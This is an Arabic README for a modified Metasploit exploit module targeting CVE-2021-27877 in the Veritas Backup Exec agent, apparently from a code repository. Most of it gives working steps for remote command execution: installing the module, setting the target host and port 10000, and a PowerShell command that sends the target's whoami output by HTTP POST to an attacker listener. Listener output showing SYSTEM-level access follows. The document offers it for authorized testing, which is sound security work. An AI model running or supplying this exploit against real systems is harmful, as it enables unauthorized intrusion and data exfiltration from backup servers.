
نسخة معدلة من وحدة Rapid7 Metasploit الخاصة بـ CVE-2021-27877 تدعم تنفيذ الأوامر المباشرة للتحقق الموثوق من الثغرات الأمنية. تتضمن وثائق تشرح سير عمل الاستغلال، وتعديلات الوحدة، وأمثلة الاستخدام.
يحتوي هذا المستودع على نسخة معدلة من وحدة Rapid7 Metasploit الأصلية لـ CVE-2021-27877 التي تؤثر على وكيل Veritas Backup Exec.
أثناء اختباراتي، نجحت الوحدة الأصلية لـ Metasploit في تحديد الهدف كعرضة للخطر لكنها فشلت باستمرار في إنشاء جلسة لأن مرحلة تسليم الحمولة لم تنجح. ومع ذلك، أظهر تحليل الوحدة أن المصادقة ووظيفة تنفيذ الأوامر الأساسية كانت تعمل بشكل صحيح.
لتبسيط التحقق من الثغرة، قمت بتعديل الوحدة لتنفيذ أوامر نظام التشغيل التي يوفرها المستخدم مباشرةً من خلال وظيفة تنفيذ أوامر NDMP الضعيفة بدلاً من رفع وتنفيذ حمولة. وهذا يسهل تأكيد تنفيذ الأوامر عن بعد دون الاعتماد على شيل عكسي أو مراحل تحميل الحمولة.
إخلاء مسؤولية: يتم توفير هذا الدليل للأغراض التعليمية واختبارات الأمن المصرح بها فقط. استخدمه فقط ضد أنظمة تمتلكها أو لديك إذن صريح لاختبارها.
ملاحظة: لحماية البيئة المستخدمة أثناء الاختبار، تم إخفاء جميع عناوين IP في هذا المستودع. في الأمثلة، يمثل
192.168.x.xالمضيف الهدف، بينما يمثل192.168.y.yالنظام المهاجم أو المستمع. لا تؤثر هذه الاستبدالات على وظيفة الدليل.
مقارنةً بالوحدة الأصلية لـ Rapid7، تم إجراء التعديلات التالية:
COMMAND.انسخ الوحدة المعدلة إلى دليل الوحدات المحلية لـ Metasploit.
cp beagent_sha_auth_rce_custom.rb /usr/share/metasploit-framework/modules/exploits/multi/veritas/
ابدأ (أعد تشغيل) Metasploit وأعد تحميل الوحدات المحلية:
msfconsole
reload_all
قبل تشغيل الوحدة، ابدأ مستمع HTTP (أو أي خادم ويب قادر على استقبال وعرض طلبات HTTP POST). سيتلقى هذا المستمع مخرجات الأمر المنفذ على الهدف.
على سبيل المثال، يمكنك استخدام خادم HTTP بسيط بلغة Python مع معالج طلبات مخصص، أو nc، أو أي مستمع HTTP تختاره.
قم بتحميل الوحدة:
use exploit/multi/veritas/beagent_sha_auth_rce_custom
قم بتكوين الخيارات المطلوبة:
set RHOSTS 192.168.x.x
set RPORT 10000
set COMMAND powershell -Command "$output = whoami; Invoke-WebRequest -Uri 'http://192.168.y.y:8080/' -Method POST -Body $output"
run
يقبل خيار COMMAND أي أمر ترغب في تنفيذه على الهدف.
تم تصميم هذه الوحدة لتنفيذ أمر واحد ولا تعيد مخرجات الأمر تلقائيًا.
لاسترداد المخرجات، استخدم آلية رد اتصال مناسبة داخل أمرك (على سبيل المثال، طلب HTTP POST أو قناة صادرة أخرى) وراقب المستمع الخاص بك.
مثال على مخرجات المستمع:
Listening on 0.0.0.0 8080
Connection received on 192.168.x.x 26006
POST / HTTP/ 1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShe11/5.1.14393.9234
Content-Type: application/x-www-form-urlencoded
Host: 192.168.y.y:8080
Content-Length: 19
Expect: 100-continue
Connection: Keep-Alive
nt authority\system